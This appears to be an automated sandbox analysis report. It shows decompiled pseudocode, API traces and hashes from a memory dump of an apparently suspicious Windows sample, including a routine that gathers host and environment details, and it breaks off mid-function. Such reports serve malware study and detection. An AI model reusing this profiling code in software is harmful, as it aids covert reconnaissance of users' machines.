0x0360f9dd
0x0360f9e3
0x0360f9e9
0x0360f9fc
0x0360fa06
0x0360fa10
0x0360fa13
0x0360fa18
0x0360fa2e
0x0360fa32
0x0360fa37
0x0360fa38
0x0360fa39
0x0360fa3e
0x0360fa41
0x0360fa42
0x0360fa43
0x0360fa48
0x0360fa57
0x0360fa5c
0x0360fa61
0x0360fa68
0x0360fa71
0x0360fa76
0x0360fa79
0x0360fa7c
0x0360fa81
0x0360fa87
0x0360fa8c
0x0360fa91
0x0360fa94
0x0360faa7
0x0360faac
0x0360faaf
0x0360faaf
0x0360fab7
0x0360fac2
0x0360fac7
0x0360faca
0x0360facd
0x0360facd
0x0360fad3
0x0360fad5
0x0360fad9
0x0360fae4
0x0360fae9
0x0360faee
0x00000000
0x00000000
0x0360faf7
0x0360fafd
0x0360fb04
0x0360fb06
0x0360fb09
0x00000000
0x0360fb09
0x00000000
0x0360fb04
0x0360fb16
0x0360fb1f
0x0360fb23

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0360F8C0,?,?,?,0360FCC4,00000000), ref: 0360FAF7

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: efb7dcf9d3419fad846989e8ac4ab6d85a029b1ef6e9568fe262ef957e739baf
Instruction ID: e37cb5e54fc5689bf4ccd7e7b0dee612bb031bc5638ac9f928a46cb7e5aee33d
Opcode Fuzzy Hash: efb7dcf9d3419fad846989e8ac4ab6d85a029b1ef6e9568fe262ef957e739baf
Instruction Fuzzy Hash: 8341A575A00208AFDB08EBA4DD86EAFB7BDEF44300F58446DE901DB285DB35D911CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03608955, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E03608955(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E036085EA(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E036085EA(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E036087D0(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E03608600( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x361e684; // 0x530f6c8
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E03608600(_t73, 0);
						}
						E03608600( &_v20, 0);
						goto L1;
					}
					_t43 = E0360A68F(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E036087FB(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E03608600( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x0360895b
0x03608962
0x03608964
0x0360896c
0x0360896e
0x03608976
0x03608978
0x0360897b
0x0360897e
0x03608992
0x03608999
0x0360899f
0x036089a8
0x03608a00
0x03608a05
0x03608a0e
0x03608a5b
0x03608a5e
0x03608a66
0x03608a6a
0x03608a6a
0x03608a6f
0x00000000
0x03608a6f
0x03608a10
0x03608a12
0x03608a1a
0x03608a20
0x03608a21
0x03608a21
0x03608a29
0x03608a2c
0x03608a31
0x03608a31
0x03608a34
0x03608a3d
0x03608a42
0x03608a48
0x03608a4f
0x00000000
0x03608a55
0x036089b1
0x036089b6
0x036089b8
0x036089bf
0x00000000
0x00000000
0x036089d4
0x00000000
0x036089d6
0x036089d6
0x036089e1
0x036089e4
0x036089f1
0x00000000
0x036089f7
0x036089d4
0x03608980
0x00000000

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000000), ref: 0360899F

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: 96e0e76a401f1bcd441e737d73479b4918e5bc4a275bbc9705eb491bead0d40d
Instruction ID: 4cb9f2581fdd8e2e7fea4c7aa1182d351082eb6cb757d22a9c48b7b3ff9f9176
Opcode Fuzzy Hash: 96e0e76a401f1bcd441e737d73479b4918e5bc4a275bbc9705eb491bead0d40d
Instruction Fuzzy Hash: 6D31C876A14705AFDB19EBA8D842B9FB7E9EF40620F24041EE505AB2C0DB70A9008B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0360E2D1, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0360E2D1(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				void* _t52;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x361e6b4; // 0x530f870, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x361e6b4; // 0x530f870
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x361e68c; // 0x530f890
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t52 = E036085EA(_v16 + 1); // executed
						_t70 = _t52;
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x361e68c; // 0x530f890
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E03604906(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x0360e2d1
0x0360e2e4
0x0360e2eb
0x0360e2f4
0x0360e2fc
0x0360e302
0x0360e307
0x0360e312
0x0360e317
0x0360e3b0
0x0360e3b0
0x0360e3b8
0x00000000
0x0360e3bd
0x0360e31e
0x0360e321
0x0360e328
0x0360e338
0x0360e33e
0x0360e349
0x0360e34e
0x0360e353
0x0360e358
0x0360e35f
0x0360e363
0x0360e36a
0x0360e36e
0x0360e372
0x0360e373
0x0360e376
0x0360e37b
0x0360e384
0x0360e390
0x0360e39a
0x0360e39f
0x0360e39f
0x0360e384
0x0360e3a5
0x0360e3a6
0x00000000
0x0360e3af
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 0360E39F

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4734dd78835c902b1c0a2b2d58dc1b039c9b4003e18d11cd3f979473f8af9d51
Instruction ID: 84920d1f08f1ecf5a428b396c4709d0c9dde0d139e4c190b427cce0a0524bdb8
Opcode Fuzzy Hash: 4734dd78835c902b1c0a2b2d58dc1b039c9b4003e18d11cd3f979473f8af9d51
Instruction Fuzzy Hash: 393118B5900218BFDB15DFA4CD85EEFBBBCEB04310F1445AAB911E7295D7319A018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0360A3D3, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0360A3D3(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E03609EB6(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E0360972F( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0360A091(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E03609F2E( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x0360a3d3
0x0360a3dc
0x0360a3de
0x0360a3e0
0x0360a3e4
0x0360a3e6
0x0360a3ee
0x0360a3f5
0x0360a3fe
0x0360a403
0x0360a408
0x0360a42c
0x0360a431
0x0360a437
0x0360a443
0x0360a448
0x0360a40a
0x0360a413
0x0360a429
0x00000000
0x0360a415
0x0360a421
0x0360a426
0x0360a413
0x0360a408
0x0360a44b
0x0360a44c
0x0360a3e6
0x0360a456

APIs

Part of subcall function 0360972F: SetLastError.KERNEL32(0000000D,00000000,00000000,0360A327,00000000,00000000,?,?,?,03605AC9), ref: 03609768

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,03604C61,?,?,00000000), ref: 0360A40A

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 1c0ca0781d3b5682f6c5420670fa75c580bdd44325e75e258c00b314e263d1c3
Instruction ID: 67abe879519af5c143b48d1491e64d05b6c8269546f853b474b65e045b43ff59
Opcode Fuzzy Hash: 1c0ca0781d3b5682f6c5420670fa75c580bdd44325e75e258c00b314e263d1c3
Instruction Fuzzy Hash: 9A11A57DB00206ABC718DFA8C58695FF3AAFB84354F608169C4029B391D730ED01CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 03605D65, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E03605D65(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x361e688; // 0x33f0000
				E0360A853( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x361e684; // 0x530f6c8
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x361e688; // 0x33f0000
					_t12 = E0360595C( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x361e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E03609EA1();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x361e688; // 0x33f0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x03605d68
0x03605d7d
0x03605d86
0x03605d8f
0x03605d91
0x03605d99
0x03605da9
0x03605db7
0x03605dbc
0x03605dc1
0x03605dc3
0x03605dc5
0x03605dca
0x03605dcc
0x03605de7
0x03605de7
0x03605dce
0x03605dcf
0x03605dda
0x03605de2
0x03605de4
0x03605de4
0x03605dcc
0x03605de9
0x03605d9b
0x03605d9c
0x03605da1
0x03605da6
0x03605da6
0x03605ded

APIs

lstrcmpiW.KERNEL32(033EFDD8,00000000), ref: 03605DDA

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5c4443d53ce60e4adee54add4e31a1504d4f23379bde8f2de07264052c2379f9
Instruction ID: da596728bcc179a9f6d38a4d6840eabe41767c9dd95d2c8370b4a5131ae0052b
Opcode Fuzzy Hash: 5c4443d53ce60e4adee54add4e31a1504d4f23379bde8f2de07264052c2379f9
Instruction Fuzzy Hash: 9E01D4312153119FE704F7A9EC5AF97B3E8DB0A200F4D502AFA03DB2C8DA20E4118BE4

Uniqueness

Uniqueness Score: -1.00%

Function 03605CD4, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03605CD4(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x361e688; // 0x33f0000
				E036124A6(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E036085D5();
				E03608F5E();
				 *0x361e780 = 0;
				 *0x361e784 = 0;
				 *0x361e77c = 0;
				E03605E9E(); // executed
				E0360CF8F(_t24);
				_t14 =  *0x361e688; // 0x33f0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x361e688; // 0x33f0000
				E0360A853( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0360B31D( &_v44);
				memset( &_v44, 0, 0x27);
				E03605C0E( &_v44, __fp0);
				_t21 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x03605cd4
0x03605cd4
0x03605cd7
0x03605ce6
0x03605ceb
0x03605cf0
0x03605cf7
0x03605cfd
0x03605d03
0x03605d09
0x03605d0e
0x03605d13
0x03605d1b
0x03605d25
0x03605d33
0x03605d3b
0x03605d47
0x03605d4f
0x03605d54
0x03605d5a
0x03605d64

APIs

Part of subcall function 036085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE

Part of subcall function 0360CF8F: GetCurrentProcess.KERNEL32(?,?,033F0000,?,0360353A), ref: 0360CF9B
Part of subcall function 0360CF8F: GetModuleFileNameW.KERNEL32(00000000,033F1644,00000105,?,?,033F0000,?,0360353A), ref: 0360CFBC
Part of subcall function 0360CF8F: memset.MSVCRT ref: 0360CFED
Part of subcall function 0360CF8F: GetVersionExA.KERNEL32(033F0000,033F0000,?,0360353A), ref: 0360CFF8
Part of subcall function 0360CF8F: GetCurrentProcessId.KERNEL32(?,0360353A), ref: 0360CFFE

Part of subcall function 0360B31D: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,03603C8B,?,?,?,?,?,?,?,?,03603D70,00000000), ref: 0360B350

memset.MSVCRT ref: 03605D47

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CurrentProcessmemset$ChangeCloseCreateFileFindHeapModuleNameNotificationVersion
String ID:
API String ID: 2687588655-0
Opcode ID: 1d328c677ab1b4e16b5ec7c239332a2f9e9c8bbc04b27b493db559fcbdd2179b
Instruction ID: 9c9a073a63721636a91f5a067c5cdc7e2332e7d198413ab52361c153a73fc30a
Opcode Fuzzy Hash: 1d328c677ab1b4e16b5ec7c239332a2f9e9c8bbc04b27b493db559fcbdd2179b
Instruction Fuzzy Hash: A501D1795113008FE704FBF8D84AD8E7BE8EF09210F49106EE905AF259DB71D010DBAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0360D02A, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0360D02A(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x361e69c; // 0x10000000
				_t81 = E036085EA(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x361e684; // 0x530f6c8
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E0361230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E03608FA4(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0360B9EB();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0360BB73( *_t88) == 0) {
					_t90 = E0360BA48(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0360E3FC(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0360E3C1(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x361e68c; // 0x530f890
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x361e694; // 0x530f820
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E03608FA4(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0360B78E(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0360B663(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E03608FBE(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0360D40B(_t43, E0360C384(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0360B870(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0360BBC5(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x361e684; // 0x530f6c8
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E036095C7(_t199, 0x10c);
				_t200 =  *0x361e684; // 0x530f6c8
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E036085BB( &_v8);
				_t124 =  *0x361e684; // 0x530f6c8
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E03609626(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x361e684; // 0x530f6c8
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x361e684; // 0x530f6c8
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x361e684; // 0x530f6c8
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E0361230C(E0360D40B(_t75, E0360C384(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E036122DE( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E03609013(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0360CD3E(_t79);
				return _t222;
			}

0x0360d02a
0x0360d034
0x0360d040
0x0360d045
0x0360d04a
0x0360d40a
0x0360d40a
0x0360d057
0x0360d05d
0x0360d062
0x0360d068
0x0360d078
0x0360d084
0x0360d084
0x0360d08d
0x0360d093
0x0360d095
0x0360d09e
0x0360d09e
0x0360d0aa
0x0360d0ae
0x0360d0b3
0x0360d0b9
0x0360d0c2
0x0360d0d0
0x0360d0d7
0x0360d0dc
0x0360d0dc
0x0360d0dd
0x0360d0c4
0x0360d0c4
0x0360d0c4
0x0360d0e3
0x0360d0ee
0x0360d0fc
0x0360d102
0x0360d106
0x0360d10c
0x0360d113
0x0360d11a
0x0360d11e
0x0360d125
0x0360d126
0x0360d133
0x0360d135
0x0360d13a
0x0360d147
0x0360d149
0x0360d149
0x0360d14b
0x0360d155
0x0360d161
0x0360d171
0x0360d177
0x0360d17d
0x0360d17f
0x0360d190
0x0360d196
0x0360d19c
0x0360d1a1
0x0360d1a7
0x0360d1ad
0x0360d1b2
0x0360d1b7
0x0360d1b7
0x0360d1bd
0x0360d1bd
0x0360d1c6
0x0360d1d2
0x0360d1da
0x0360d1de
0x0360d1de
0x0360d1da
0x0360d1e2
0x0360d1e8
0x0360d1ee
0x0360d1f5
0x0360d206
0x0360d20c
0x0360d214
0x0360d21b
0x0360d22e
0x0360d234
0x0360d239
0x0360d23c
0x0360d23f
0x0360d245
0x0360d24b
0x0360d24d
0x0360d253
0x0360d25c
0x0360d25f
0x0360d25f
0x0360d262
0x0360d26a
0x0360d275
0x0360d27b
0x0360d26c
0x0360d26e
0x0360d26e
0x0360d284
0x0360d284
0x0360d28a
0x0360d292
0x0360d29d
0x0360d2a2
0x0360d2a8
0x0360d2aa
0x0360d2b7
0x0360d2b8
0x0360d2b9
0x0360d2c4
0x0360d2c6
0x0360d2cd
0x0360d2cd
0x0360d2d7
0x0360d2dc
0x0360d2e1
0x0360d2e1
0x0360d2e7
0x0360d2ee
0x0360d2ef
0x0360d2fc
0x0360d30f
0x0360d314
0x0360d319
0x0360d322
0x0360d322
0x0360d328
0x0360d32d
0x0360d333
0x0360d339
0x0360d33e
0x0360d347
0x0360d349
0x0360d350
0x0360d350
0x0360d356
0x0360d35e
0x0360d363
0x0360d364
0x0360d369
0x0360d372
0x0360d374
0x0360d37f
0x0360d37f
0x0360d388
0x0360d390
0x0360d397
0x0360d39c
0x0360d3ab
0x0360d3c3
0x0360d3ca
0x0360d3d8
0x0360d3ea
0x0360d3f1
0x0360d3fe
0x00000000

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

GetCurrentProcessId.KERNEL32 ref: 0360D051
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0360D08D
GetCurrentProcess.KERNEL32 ref: 0360D0AA
GetLastError.KERNEL32 ref: 0360D149
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0360D177
GetLastError.KERNEL32 ref: 0360D17D
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0360D1D2
GetCurrentProcess.KERNEL32 ref: 0360D219
memset.MSVCRT ref: 0360D234
GetVersionExA.KERNEL32(00000000), ref: 0360D23F
GetCurrentProcess.KERNEL32(00000100), ref: 0360D259
GetSystemInfo.KERNEL32(?), ref: 0360D275
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0360D292

Strings

TEMP, xrefs: 0360D333, 0360D33E, 0360D34F
TEMP, xrefs: 0360D2FE
SystemDrive, xrefs: 0360D35E, 0360D369, 0360D37E
USERPROFILE, xrefs: 0360D2EF, 0360D31D
%s\%s, xrefs: 0360D304

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: cf4251c9d23e28c2d660bf6896e9091eadc84452e5ff66e1882580361ead986b
Instruction ID: 6507bbe6bbb28dd3dab024ccfe07d9a581d22c5c9c7134bd092c0eaf7cfbc577
Opcode Fuzzy Hash: cf4251c9d23e28c2d660bf6896e9091eadc84452e5ff66e1882580361ead986b
Instruction Fuzzy Hash: 5EB18F75600704AFD718EFB4D989FEB77E8EF08300F04496EE55ADB285EB70A5048B65

Uniqueness

Uniqueness Score: -1.00%

Function 0360DB47, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0360DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
